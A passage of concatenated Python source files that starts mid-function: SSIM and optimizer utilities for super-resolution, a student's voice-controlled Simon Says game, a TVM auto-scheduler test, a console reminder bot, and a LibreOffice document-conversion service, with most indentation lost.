y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return h
def calc_ssim(X, Y, scale, rgb_range, dataset=None, sigma=1.5, K1=0.01, K2=0.03, R=255):
'''
X : y channel (i.e., luminance) of transformed YCbCr space of X
Y : y channel (i.e., luminance) of transformed YCbCr space of Y
Please follow the setting of psnr_ssim.m in EDSR (Enhanced Deep Residual Networks for Single Image Super-Resolution CVPRW2017).
Official Link : https://github.com/LimBee/NTIRE2017/tree/db34606c2844e89317aac8728a2de562ef1f8aba
The authors of EDSR use MATLAB's ssim as the evaluation tool,
thus this function is the same as ssim.m in MATLAB with C(3) == C(2)/2.
'''
gaussian_filter = matlab_style_gauss2D((11, 11), sigma)
if dataset and dataset.dataset.benchmark:
shave = scale
if X.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = X.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
X = X.mul(convert).sum(dim=1)
Y = Y.mul(convert).sum(dim=1)
else:
shave = scale + 6
X = X[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
Y = Y[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
window = gaussian_filter
ux = signal.convolve2d(X, window, mode='same', boundary='symm')
uy = signal.convolve2d(Y, window, mode='same', boundary='symm')
uxx = signal.convolve2d(X*X, window, mode='same', boundary='symm')
uyy = signal.convolve2d(Y*Y, window, mode='same', boundary='symm')
uxy = signal.convolve2d(X*Y, window, mode='same', boundary='symm')
vx = uxx - ux * ux
vy = uyy - uy * uy
vxy = uxy - ux * uy
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1, 2 * vxy + C2, ux ** 2 + uy ** 2 + C1, vx + vy + C2))
D = B1 * B2
S = (A1 * A2) / D
mssim = S.mean()
return mssim
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
SimonVoiceGame.py
|
"""Welcome to Joe Ricci's Simon Says Game
In this game you can speak to your computer
as your input instead of typing or clicking.
You will see a splash screen with instructions.
Follow the instructions shown on display to play the game.
Another option is that you can enable the Debug mode and the game will play itself!
You can see how the game works and all of the troubleshooting text that appears in the CLI.
There are two ways you can speak to the program and it will recognize your input.
1) Say each color in order
2) Say 'and' in between each color
As you progress, the patterns get harder.
The maximum level is 20; once you pass it, you win!
Good Luck!
"""
"""Note: There is a bug in the system when using debug, sometimes you do not have to click inside the window
in order to continue the process."""
import pygame as pg
import speech_recognition as sr
import time, gtts, sys, os, pyaudio, random,wave
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
import speech
import pywin32_system32
from threading import Thread
r = sr.Recognizer()
colorinputpattern = []
debug = True
#Class options contains all the variables used inside the game.
class options:
# Game Title Window
TITLE = "Voice Simon Says Game"
# Colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
#Set default level
LEVEL = 1
# Set colors
BGROUND = WHITE
# Game FPS
FPS = 30
# Window Size
W_WIDTH = 640
W_HEIGHT = 680
COUNT = True
COLORS = ['red', 'blue', 'green', 'yellow']
COLORPATTERN = []
MOUSEPATTERN = []
VOICEPATTERN = []
W_WIDTH = 640
W_HEIGHT = 480
BOX_WIDTH = (W_WIDTH / 2) - 10
BOX_HEIGHT = (W_HEIGHT / 2) - 15
score = 0
BLUESQUARE = pg.Rect(0, 0, BOX_WIDTH, BOX_HEIGHT)
REDSQUARE = pg.Rect(0, (W_HEIGHT / 2), BOX_WIDTH, BOX_HEIGHT)
YELLOWSQUARE = pg.Rect(W_WIDTH / 2, 0, BOX_WIDTH + 10, BOX_HEIGHT)
GREENSQUARE = pg.Rect(W_WIDTH / 2, W_HEIGHT / 2, BOX_WIDTH + 10, BOX_HEIGHT)
CURRENTSTEP = 0
WAITINGFORINPUT = False
#Class game contains majority of the code used to run the game.
class game:
level = 1
splash = True
def __init__(self):
if debug is True:
print('Running initialization')
global pattern
global colorinputpattern
pg.init()
self.screen = pg.display.set_mode((options.W_WIDTH, options.W_HEIGHT))
pg.display.set_caption(options.TITLE)
if game.splash is True:
self.splashscreen()
time.sleep(5)
game.splash = False
#Setup the background for the game
self.background()
# Draw each square onto background
self.drawBoxes()
# Blit everything to the screen
pg.display.flip()
self.clock = pg.time.Clock()
self.running = True
self.start_game()
# This function is from the play sound example done in class, modified to be used appropriately in this program
def playsound(self):
inputstream = wave.open(
"C:\\Users\\jricc3\\OneDrive - University of New Haven\\Fall 2016\\Adv Python\\Class 9\\shortbeep.wav")
pyoutputstream = pyaudio.PyAudio()
outputstream = pyoutputstream.open(output=True, rate=inputstream.getframerate(),
channels=inputstream.getnchannels(),
format=pyoutputstream.get_format_from_width(inputstream.getsampwidth()))
chunksize = 1024
data = inputstream.readframes(chunksize)
while data != "":
outputstream.write(data)
data = inputstream.readframes(chunksize)
outputstream.stop_stream()
outputstream.close()
inputstream.close()
pyoutputstream.terminate()
return
#Create the background for the game
def background(self):
# Fill background
background = pg.Surface(self.screen.get_size())
background = background.convert()
background.fill((options.BGROUND))
self.screen.blit(background, (0, 0))
self.drawBoxes()
#Start a new game
def new(self):
game.__init__(self)
#Create a pattern for the user to try and copy
def setPattern(self, color):
options.COLORPATTERN.append(color)
print("Here is the color pattern:" +str(options.COLORPATTERN))
self.updateBoxes(options.COLORPATTERN)
pass
#Draw the boxes on screen
def drawBoxes(self):
level = len(options.COLORPATTERN)
if debug == True:
print('drawBoxes')
pg.draw.rect(self.screen, options.BLUE, options.BLUESQUARE, 1)
pg.draw.rect(self.screen, options.RED, options.REDSQUARE, 1)
pg.draw.rect(self.screen, options.YELLOW, options.YELLOWSQUARE, 1)
pg.draw.rect(self.screen, options.GREEN, options.GREENSQUARE, 1)
myfont = pg.font.SysFont("Comic Sans MS", 14)
label1 = myfont.render("Level: " + str(level), 1, options.BLACK)
self.screen.blit(label1, (290, 462))
#Update the boxes in the game to represent the updated color pattern
def updateBoxes(self, COLORPATTERN):
for i in COLORPATTERN:
            thread = Thread(target=self.playsound)
if debug == True:
print("updating boxes")
if i == 'blue':
#self.playsound()
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.BLUE, options.BLUESQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.draw.rect(self.screen, options.WHITE, options.BLUESQUARE, 0)
pg.display.flip()
self.background()
thread.start()
elif i == 'red':
#self.playsound()
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.RED, options.REDSQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.draw.rect(self.screen, options.WHITE, options.REDSQUARE, 0)
pg.display.flip()
self.background()
thread.start()
elif i == 'yellow':
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.YELLOW,options.YELLOWSQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.display.update()
pg.draw.rect(self.screen, options.WHITE, options.YELLOWSQUARE, 0)
pg.display.flip()
self.background()
thread.start()
elif i == "green":
#self.playsound()
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.GREEN, options.GREENSQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.draw.rect(self.screen, options.WHITE, options.GREENSQUARE, 0)
pg.display.flip()
self.background()
thread.start()
time.sleep(1)
self.background()
def start_game(self):
#Let us know that we are in the start game function
if debug == True:
print('Game has started')
global WAITINGFORINPUT
global CURRENTSTEP
global clickedButton
global colorinputpattern
clickedButton = None
#randomly pick a color for the options and assign it to color
color = random.choice(options.COLORS)
#Wait until the player clicks in the game window and the color pattern has been established
for event in pg.event.get():
if event.type == pg.MOUSEBUTTONUP and options.WAITINGFORINPUT is True:
#Check to see that the event worked and the waiting for input logic worked
if debug == True:
print('You clicked in the game')
#check the color input pattern
colorinputpattern = game.getButtonClicked(self)
options.WAITINGFORINPUT = False
#When we are not waiting for user input, append a new color to the color list and set waiting-for-input to True
if not options.WAITINGFORINPUT:
if debug == True:
print('Waiting for input and appending to color list')
self.setPattern(color)
options.WAITINGFORINPUT = True
else:
#Enter a loop while waiting for the user to click inside the window
if debug is True:
print('Waiting for user input')
else:
print('')
def splashscreen(self):
background = pg.Surface(self.screen.get_size())
background = background.convert()
background.fill(options.BLACK)
# pick a font and set its size
myfont = pg.font.SysFont("Comic Sans MS", 24)
# apply it to text on a label
label1 = myfont.render("Welcome to Joe Ricci's ", 1, options.YELLOW)
label2= myfont.render("Simon Says Voice Game!", 1 , options.YELLOW)
# put the label object on the screen at specified point
self.screen.blit(label1, (210, 150))
self.screen.blit(label2, (200, 200))
# Blit everything to the screen
pg.display.flip()
time.sleep(5)
myfont = pg.font.SysFont("Comic Sans MS", 24)
label1 = myfont.render("Welcome to Joe Ricci's ", 1, options.BLACK)
label2 = myfont.render("Simon Says Voice Game!", 1, options.BLACK)
self.screen.blit(label1, (210, 150))
self.screen.blit(label2, (200, 200))
pg.display.flip()
background.fill(options.BLACK)
instruction = myfont.render('The game will begin shortly', 1 ,options.YELLOW, options.BLACK)
instruction2 = myfont.render('so in the mean time, here are the instructions:', 1, options.YELLOW, options.BLACK)
# put the label object on the screen at specified point and write to screen
self.screen.blit(instruction, (20, 150))
self.screen.blit(instruction2, (50, 200))
# Show all items drawn to screen
pg.display.flip()
time.sleep(5)
background.fill(options.BLACK)
instruction = myfont.render('The game will begin shortly,', 1, options.BLACK, options.BLACK)
instruction2 = myfont.render('so in the mean time, here are the instructions:', 1, options.BLACK, options.BLACK)
# put the label object on the screen at specified point
self.screen.blit(instruction, (20, 150))
self.screen.blit(instruction2, (50, 200))
# Blit everything to the screen
pg.display.flip()
background.fill(options.BLACK)
instruction = myfont.render('A colored box will flash', 1, options.YELLOW, options.BLACK)
instruction2 = myfont.render('When you are ready, click anywhere in the window', 1, options.YELLOW, options.BLACK)
instruction3 = myfont.render('and say the color that you saw flash.', 1, options.YELLOW, options.BLACK)
instruction4 = myfont.render('As you progress through the levels,',1 , options.YELLOW, options.BLACK)
instruction5 = myfont.render('the pattern will get longer.', 1, options.YELLOW, options.BLACK)
instruction6 = myfont.render('This will continue until you ', 1 ,options.YELLOW, options.BLACK)
instruction7 = myfont.render('reach level 20 and you win the game!', 1 ,options.YELLOW, options.BLACK)
# put the label object on the screen at specified point
self.screen.blit(instruction, (20, 50))
self.screen.blit(instruction2, (20, 100))
self.screen.blit(instruction3, (20, 150))
self.screen.blit(instruction4, (20, 200))
self.screen.blit(instruction5, (20, 250))
self.screen.blit(instruction6, (20, 300))
self.screen.blit(instruction7, (20, 350))
# Blit everything to the screen
pg.display.flip()
time.sleep(10)
#When the player loses this function is called
def lose(self):
quit()
#When user clicks, it means they are ready to input through microphone and say pattern
def getButtonClicked(self):
#The length of the pattern is the same as the level
level = len(options.COLORPATTERN)
#To let programmer know that we are in this function
if debug == True:
print('getting voice input')
print('Welcome to level: ' +str(level))
#Reset voice input to an empty list
voiceinput = []
stop = False
while stop == False:
try:
#When debug is set to false, use the microphone as user input
if debug == False:
with sr.Microphone(0) as mic:
# mic = speech_recognition.Microphone(0)
r.energy_threshold = 3000
r.dynamic_energy_threshold = True
print('Tell me the pattern')
audio = r.listen(mic)
text = r.recognize_google(audio)
print("You said: ", text)
#Debug is used to automate level increment logic. Much quicker than using voice.
elif debug == True:
text = options.COLORPATTERN
print("You said: ", text)
# if level is over 20 then the player wins
if level == 21:
print("Game over, you win!")
#When the user is on level 1, compare the elements of the two separate lists
elif level == 1:
print('checking the color logic')
for i in text:
print(i)
for c in options.COLORPATTERN:
print(c)
if i == c:
print('we have a match!')
else:
print('There is not a match')
self.lose()
break
stop = True
#If the user says "and" in between each color, separate the colors and put them into a list
elif 'and' in text and level > 1:
voiceinput = [c.strip() for c in text.split('and')]
level += 1
stop = True
#If the user does not say and in between colors then use this logic
elif level > 1 and text == options.COLORPATTERN:
print('doing more stuffs')
level += 1
stop = True
#Game win logic
elif level == 21:
print('you win!')
except sr.UnknownValueError as e:
print(e)
return voiceinput
#Set the class "game" as "g"
g = game()
#done will stop the game when = False
done = True
#Main game loop, while done == True the game will run
while done == True:
#Start a new game to initialize the game
g.new()
g.start_game()
#When the user tries to quit, sets done = False and ends game
for event in pg.event.get():
if event.type == pg.QUIT:
done = False
#quit game
pg.quit()
|
test_auto_scheduler_task_scheduler.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test task scheduler """
import tempfile
import multiprocessing
import numpy as np
import tvm
import tvm.testing
from tvm import auto_scheduler
from test_auto_scheduler_common import matmul_auto_scheduler_test
@tvm.testing.requires_llvm
def test_task_scheduler_round_robin():
tasks = []
for n in [2, 4, 8]:
tasks.append(
auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(n, n, n), target="llvm"
)
)
with tempfile.NamedTemporaryFile() as fp:
log_file = fp.name
num_trials_per_task = 2
# Tune all tasks
measure_ctx = auto_scheduler.LocalRPCMeasureContext()
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=num_trials_per_task * len(tasks),
runner=measure_ctx.runner,
num_measures_per_round=1,
measure_callbacks=[auto_scheduler.RecordToFile(log_file)],
)
task_scheduler = auto_scheduler.TaskScheduler(tasks, strategy="round-robin", callbacks=[])
task_scheduler.tune(tune_option, search_policy="sketch.random")
# Check the result of round robin
counters = {}
for task in tasks:
counters[task.workload_key] = 0
for inp, _ in auto_scheduler.load_records(log_file):
counters[inp.task.workload_key] += 1
for task in tasks:
assert counters[task.workload_key] == num_trials_per_task
# test continuous tuning (restoring the status)
task_scheduler = auto_scheduler.TaskScheduler(
tasks, strategy="round-robin", load_log_file=log_file, callbacks=[]
)
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=len(tasks),
num_measures_per_round=1,
)
task_scheduler.tune(tune_option, search_policy="sketch.random")
del measure_ctx
@tvm.testing.requires_llvm
def task_scheduler_round_robin_spawn():
assert multiprocessing.get_start_method(False) == "spawn"
test_task_scheduler_round_robin()
@tvm.testing.requires_llvm
def test_task_scheduler_round_robin_spawn():
ctx = multiprocessing.get_context("spawn")
p = ctx.Process(target=task_scheduler_round_robin_spawn)
p.start()
p.join()
@tvm.testing.requires_llvm
def test_task_scheduler_gradient():
tasks = []
for n in [2, 4]:
tasks.append(
auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(n, n, n), target="llvm"
)
)
def objective_func(costs):
return costs[0]
with tempfile.NamedTemporaryFile() as fp:
log_file = fp.name
n_trials = 5
# Tune all tasks
measure_ctx = auto_scheduler.LocalRPCMeasureContext()
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=n_trials,
runner=measure_ctx.runner,
num_measures_per_round=1,
measure_callbacks=[auto_scheduler.RecordToFile(log_file)],
)
task_scheduler = auto_scheduler.TaskScheduler(
tasks, objective_func=objective_func, callbacks=[]
)
# Forcibly rewrite the initial values.
# This can make this test more stable on the slow CI machines
task_scheduler.best_costs = np.array([1e2, 1e-8])
task_scheduler.tune(tune_option, search_policy="sketch.random")
# Check the allocation results
counters = {}
for task in tasks:
counters[task.workload_key] = 0
for inp, _ in auto_scheduler.load_records(log_file):
counters[inp.task.workload_key] += 1
assert counters[tasks[0].workload_key] == n_trials - 1
assert counters[tasks[1].workload_key] == 1
del measure_ctx
if __name__ == "__main__":
test_task_scheduler_round_robin()
test_task_scheduler_round_robin_spawn()
test_task_scheduler_gradient()
|
reminder.py
|
import time
import threading
import os
import playsound
import random
import json
ftime=0
ptime=0
start = -1
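# Timer bookkeeping (sketch of how the variables above are used):
#   start - timestamp when the current reminder interval began (-1 until the first start)
#   ptime - timestamp at which the user last paused the reminder
#   ftime - total time spent paused, subtracted from the elapsed time in rem_func()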
with open('./config.json') as f:
config = json.load(f)
TIME = config['time']*60
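# config.json is expected to provide the reminder interval in minutes, e.g. (illustrative):
# {
#     "time": 20
# }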
a_files=os.listdir("./Audio_Files/")
def input_func():
global ftime,ptime,start
startevent.set()
print(f"Welcome to ReminderBot! 0 to Pause and -1 to exit! Ill Remind you every {TIME/60} minutes")
while True:
s = int(input())
if s == 1:
if not pauseevent.is_set():
continue
print("Reminder Resumed! Select 0 to pause and -1 to exit")
ftime=ftime+time.time()-ptime
pauseevent.clear() # Resume Remindabot
elif s==0:
if pauseevent.is_set():
continue
ptime = time.time()
print(f"Reminder Paused! {(ptime-start)/60} mins elapsed (Select 1 to Resume and -1 to exit)")
pauseevent.set()
elif s==-1:
killevent.set()
break
print("Program Exited")
def rem_func():
global ftime,start
while True:
time.sleep(0.1)  # small sleep so this polling loop does not pin a CPU core
if killevent.is_set(): # Check if thread should be killed
break
if pauseevent.is_set(): # Check for Pause Condition
continue
if startevent.is_set(): # Check for initial Start condition of timer.
start = time.time()
startevent.clear()
if not startevent.is_set(): # If startevent is false, Check for time match.
if start!=-1:
cur = time.time()
if cur-start-ftime>=TIME:
print(f"{TIME/60} mins has elapsed")
playsound.playsound(f"./Audio_Files/{random.choice(a_files)}",True)
startevent.set()
ftime=0
pauseevent = threading.Event()
killevent = threading.Event()
startevent = threading.Event()
t1 = threading.Thread(target=input_func)
t2 = threading.Thread(target=rem_func)
t1.start()
t2.start()
|
convert.py
|
import os
import sys
import asyncio
import subprocess
import os.path
import time
import threading
import tempfile
import logging
import mimetypes
import pprint
from functools import partial
from io import BytesIO
from concurrent.futures import ThreadPoolExecutor
from tempfile import gettempdir
import uno
import unohelper
from com.sun.star.beans import PropertyValue
from com.sun.star.lang import DisposedException, IllegalArgumentException
from com.sun.star.connection import NoConnectException
from com.sun.star.io import IOException, XOutputStream
from com.sun.star.script import CannotConvertException
from com.sun.star.uno import RuntimeException
from config import MAX_MEMORY, MAX_CONCURRENCY
# A pool of workers to perform conversions.
EXECUTOR = ThreadPoolExecutor(max_workers=MAX_CONCURRENCY)
SOFFICE = None
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.NullHandler())
DEFAULT_FILTER = "com.sun.star.text.GenericTextDocument"
FILTERS = {
"pdf": {
"com.sun.star.text.GenericTextDocument": "writer_pdf_Export",
"com.sun.star.sheet.SpreadsheetDocument": "calc_pdf_Export",
"com.sun.star.text.WebDocument": "writer_web_pdf_Export",
"com.sun.star.presentation.PresentationDocument": "impress_pdf_Export",
"com.sun.star.drawing.DrawingDocument": "draw_pdf_Export",
},
"png": {
"com.sun.star.text.GenericTextDocument": "writer_png_Export",
"com.sun.star.sheet.SpreadsheetDocument": "calc_png_Export",
"com.sun.star.text.WebDocument": "writer_web_png_Export",
"com.sun.star.presentation.PresentationDocument": "impress_png_Export",
"com.sun.star.drawing.DrawingDocument": "draw_png_Export",
}
}
IMPORT_FILTERS = {
'.bib': 'BibTeX_Writer',
'.bmp': 'draw_bmp_Export',
'.csv': 'Text - txt - csv (StarCalc)',
'.dbf': 'dBase',
'.dif': 'DIF',
'.doc': 'MS Word 97',
'.docx': 'Office Open XML Text',
'.emf': 'draw_emf_Export',
'.eps': 'draw_eps_Export',
'.fodg': 'OpenDocument Drawing Flat XML',
'.fodp': 'OpenDocument Presentation Flat XML',
'.fods': 'OpenDocument Spreadsheet Flat XML',
'.fodt': 'OpenDocument Text Flat XML',
'.gif': 'draw_gif_Export',
'.html': 'HTML (StarWriter)',
'.jpg': 'draw_jpg_Export',
'.ltx': 'LaTeX_Writer',
'.met': 'draw_met_Export',
'.odd': 'draw8',
'.odg': 'impress8_draw',
'.odp': 'impress8',
'.ods': 'calc8',
'.odt': 'writer8',
'.otg': 'draw8_template',
'.otp': 'impress8_template',
'.ots': 'calc8_template',
'.ott': 'writer8_template',
'.pbm': 'draw_pbm_Export',
'.pct': 'draw_pct_Export',
'.pdb': 'AportisDoc Palm DB',
'.pdf': 'writer_pdf_Export',
'.pgm': 'draw_pgm_Export',
'.png': 'draw_png_Export',
'.pot': 'MS PowerPoint 97 Vorlage',
'.potm': 'Impress MS PowerPoint 2007 XML Template',
'.ppm': 'draw_ppm_Export',
'.pps': 'MS PowerPoint 97 Autoplay',
'.ppt': 'MS PowerPoint 97',
'.pptx': 'Impress MS PowerPoint 2007 XML',
'.psw': 'PocketWord File',
'.pwp': 'placeware_Export',
'.pxl': 'Pocket Excel',
'.ras': 'draw_ras_Export',
'.rtf': 'Rich Text Format',
'.sda': 'StarDraw 5.0 (StarImpress)',
'.sdc': 'StarCalc 5.0',
'.sdd': 'StarImpress 5.0',
'.sdw': 'StarWriter 5.0',
'.slk': 'SYLK',
'.stc': 'calc_StarOffice_XML_Calc_Template',
'.std': 'draw_StarOffice_XML_Draw_Template',
'.sti': 'impress_StarOffice_XML_Impress_Template',
'.stw': 'writer_StarOffice_XML_Writer_Template',
'.svg': 'draw_svg_Export',
'.svm': 'draw_svm_Export',
'.swf': 'draw_flash_Export',
'.sxc': 'StarOffice XML (Calc)',
'.sxd': 'StarOffice XML (Draw)',
'.sxi': 'StarOffice XML (Impress)',
'.sxw': 'StarOffice XML (Writer)',
'.tiff': 'draw_tif_Export',
'.txt': 'Text',
'.uop': 'UOF presentation',
'.uos': 'UOF spreadsheet',
'.uot': 'UOF text',
'.vor': 'StarWriter 5.0 Vorlage/Template',
'.wmf': 'draw_wmf_Export',
'.wps': 'MS_Works',
'.xhtml': 'XHTML Calc File',
'.xls': 'MS Excel 97',
'.xlsx': 'Calc MS Excel 2007 XML',
'.xlt': 'MS Excel 97 Vorlage/Template',
'.xml': 'DocBook File',
'.xpm': 'draw_xpm_Export'
}
def property(name, value):
prop = PropertyValue()
prop.Name = name
prop.Value = value
return prop
def property_tuple(d):
properties = []
for k, v in d.items():
properties.append(property(k, v))
return tuple(properties)
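# For example (illustrative), property_tuple({"Hidden": True, "ReadOnly": True}) returns a
# tuple of two com.sun.star.beans.PropertyValue objects with Name/Value set accordingly,
# which is the shape loadComponentFromURL() and storeToURL() expect for their property arguments.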
def input_props(content_type):
props = {
"Hidden": True,
"MacroExecutionMode": 0,
"ReadOnly": True,
"Overwrite": True,
"OpenNewView": True,
"StartPresentation": False,
"RepairPackage": False,
}
extension = mimetypes.guess_extension(content_type)
if extension:
filter = IMPORT_FILTERS.get(extension)
if filter:
props["FilterName"] = filter
return property_tuple(props)
def output_props(doc, format, pages=None):
filters = FILTERS[format]
filter = filters[DEFAULT_FILTER]
for k, v in filters.items():
if doc.supportsService(k):
filter = v
break
props = property_tuple({
"FilterName": filter,
"Overwrite": True,
"ReduceImageResolution": True,
"MaxImageResolution": 300,
})
if format == 'pdf':
props += (property("SelectPdfVersion", 1),)
if pages:
page_range = tuple([
PropertyValue('PageRange', 0, '%i-%i' % pages, 0)
])
page_prop = uno.Any("[]com.sun.star.beans.PropertyValue", page_range)
props += tuple([
PropertyValue("FilterData", 0, page_prop, 0)
])
return props
class OutputStream(unohelper.Base, XOutputStream):
"""
Simple class to receive output from soffice.
"""
def __init__(self):
self.f = BytesIO()
self.closed = False
def closeOutput(self):
self.closed = True
def writeBytes(self, seq):
if self.closed:
raise IOError('write to closed stream')
try:
self.f.write(seq.value)
except Exception as e:
LOGGER.exception(e)
raise
def getvalue(self):
return self.f.getvalue()
def flush(self):
pass
class Connection(object):
"""
Manages connection to soffice.
This class handles all the details of the conversion.
"""
def __init__(self):
self.context = uno.getComponentContext()
self.service_manager = self.context.ServiceManager
resolver = self.service_manager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", self.context)
ctx = resolver.resolve('uno:%s' % SOffice.ADDRESS)
self.desktop = ctx.ServiceManager.createInstanceWithContext(
"com.sun.star.frame.Desktop", ctx)
def input_stream(self, data):
stream = self.service_manager.createInstanceWithContext(
"com.sun.star.io.SequenceInputStream", self.context)
seq = uno.ByteSequence(data)
# NOTE: the call below passes a tuple.
stream.initialize((seq,))
return stream, "private:stream"
def convert(self, format, url=None, data=None, content_type=None, pages=None,
size=None):
# Ultimately, this is the function called by convert()
in_props = input_props(content_type)
if data:
in_stream, url = self.input_stream(data)
in_props += (property("InputStream", in_stream),)
LOGGER.debug('in_url: %s', url)
LOGGER.debug('in_props: %s', pprint.pformat(in_props))
for i in range(3):
try:
doc = self.desktop.loadComponentFromURL(
url, "_blank", 0, in_props)
break
except Exception as e:
LOGGER.exception(e)
if i == 2:
raise
LOGGER.info('Retrying connection to soffice')
time.sleep(0.5)
out_props = output_props(doc, format, pages)
out_stream = None
# We estimate the output size to be close to the input file size. If it
# is expected to be large, we write to disk.
if size is not None and size <= MAX_MEMORY:  # guard against a missing size; unknown sizes fall through to disk
out_stream = OutputStream()
out_props += (property("OutputStream", out_stream),)
out_url = "private:stream"
else:
_fd, out_url = tempfile.mkstemp(suffix='.%s' % format)
os.close(_fd)
out_url = unohelper.systemPathToFileUrl(out_url)
LOGGER.debug('out_url: %s', out_url)
LOGGER.debug('out_props: %s', pprint.pformat(out_props))
try:
try:
doc.ShowChanges = False
except AttributeError:
pass
try:
doc.refresh()
except AttributeError:
pass
doc.storeToURL(out_url, out_props)
finally:
doc.dispose()
doc.close(True)
if out_stream:
output = BytesIO(out_stream.getvalue())
else:
# NOTE: strip off file://
output = open(out_url[7:], 'rb')
LOGGER.debug('%s as: %s', format, output.__class__)
return output
class SOffice(object):
"""
Execute soffice and monitor process health.
This thread runs soffice, sends its output to stdout / stderr and
restarts it if necessary.
"""
ADDRESS = "socket,host=localhost,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext"
INSTALL_DIR = os.path.join(gettempdir(), "soffice")
COMMAND = [
"/usr/bin/soffice",
"-env:UserInstallation=file:///%s" % INSTALL_DIR,
"-env:JFW_PLUGIN_DO_NOT_CHECK_ACCESSIBILITY=1",
"--nologo",
"--headless",
"--invisible",
"--nocrashreport",
"--nodefault",
"--norestore",
"--safe-mode",
"--accept=%s" % ADDRESS,
]
def __init__(self):
self.p = None
self.t = threading.Thread(target=self._run)
self.t.start()
def _run(self):
while True:
if self.p is None:
LOGGER.info('Starting soffice')
self.p = subprocess.Popen(
SOffice.COMMAND,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
while self.p.poll() is None:
try:
out, err = self.p.communicate(timeout=1.0)
if out:
LOGGER.info('soffice stdout: %s', out)
if err:
LOGGER.info('soffice stderr: %s', err)
except subprocess.TimeoutExpired:
pass
LOGGER.warning('Exited with returncode: %s', self.p.returncode)
time.sleep(1.0)
def _convert(format, *args, **kwargs):
LOGGER.debug('Converting document to %s, arguments...', format)
for i, arg in enumerate(args):
LOGGER.debug('[%i]: %s', i, arg)
for n, v in kwargs.items():
try:
length = len(v)
if length > 100:
v = length
except (TypeError, ValueError):
pass
LOGGER.debug('["%s"]: %s', n, v)
return Connection().convert(format, *args, **kwargs)
async def convert(*args, **kwargs):
loop = asyncio.get_running_loop()
# NOTE: the file argument is removed, our convert() function only handles
# a data buffer or url (which can be a local path).
f = kwargs.pop('file', None)
if f:
# An AsyncSpooledTemporaryFile has a SpooledTemporaryFile as its
# _file attribute.
if hasattr(f, '_file') and getattr(f._file, '_rolled', None) is False:
# Get a reference to BytesIO.
f = f._file._file
kwargs['data'] = f.getvalue()
LOGGER.debug('Read %i bytes into buffer', kwargs['size'])
else:
kwargs['url'] = unohelper.systemPathToFileUrl(f._file.name)
LOGGER.debug('File is %i bytes', kwargs['size'])
# NOTE: we use an executor here for a few reasons:
# - This call is blocking, so we want it in a background thread. Since it
# is mostly I/O, this should be a good choice.
# - We want to only have one request at a time to soffice. Since we have a
# single threaded executor, we achieve this without extra work.
return await loop.run_in_executor(EXECUTOR, partial(_convert, *args, **kwargs))
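# Rough usage sketch (assumes an asyncio context; the file name and content type below
# are illustrative, not part of this module):
#
#   with open("report.docx", "rb") as fh:
#       data = fh.read()
#   pdf = await convert(
#       "pdf",
#       data=data,
#       content_type="application/vnd.openxmlformats-officedocument.wordprocessingml.document",
#       size=len(data),
#   )
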